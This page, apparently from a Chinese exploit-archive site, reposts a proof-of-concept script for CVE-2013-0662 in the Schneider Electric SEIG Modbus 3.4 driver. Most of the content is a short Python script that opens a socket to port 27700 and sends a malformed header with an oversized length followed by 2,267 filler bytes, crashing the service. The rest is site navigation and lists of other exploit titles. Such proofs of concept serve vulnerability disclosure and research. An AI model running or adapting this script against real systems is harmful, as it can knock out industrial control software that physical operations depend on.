首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
Exploits
>文章内容
SEIG Modbus 3.4 - Denial of Service (PoC)
来源:vfocus.net 作者:Parodi 发布时间:2018-08-27
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage:
https://www.schneider-electric.com
# Software Link:
https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
import time
ip = "192.168.127.137"
port = 27700
con = (ip, port)
header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"
header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
CVE-2012-0217 Intel sysret exp
·
Linux Kernel 2.6.32 Local Root
·
Array Networks vxAG / xAPV Pri
·
Novell NetIQ Privileged User M
·
Array Networks vAPV / vxAG Cod
·
Excel SLYK Format Parsing Buff
·
PhpInclude.Worm - PHP Scripts
·
Apache 2.2.0 - 2.2.11 Remote e
·
VideoScript 3.0 <= 4.0.1.50 Of
·
Yahoo! Messenger Webcam 8.1 Ac
·
Family Connections <= 1.8.2 Re
·
Joomla Component EasyBook 1.1
相关文章
·
SEIG SCADA System 9 - Remote C
·
SEIG Modbus 3.4 - Remote Code
·
Microsoft Edge Chakra JIT - In
·
Zortam MP3 Media Studio 23.95
·
Microsoft Edge Chakra JIT - 'I
·
Restorator 1793 - Denial of Se
·
Microsoft Edge Chakra JIT - 'D
·
Prime95 29.4b7 - Denial Of Ser
·
Microsoft Edge Chakra JIT - Pa
·
Easylogin Pro 1.3.0 - 'Encrypt
·
Microsoft Edge Chakra JIT - Im
·
Project64 2.3.2 - Denial Of Se
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved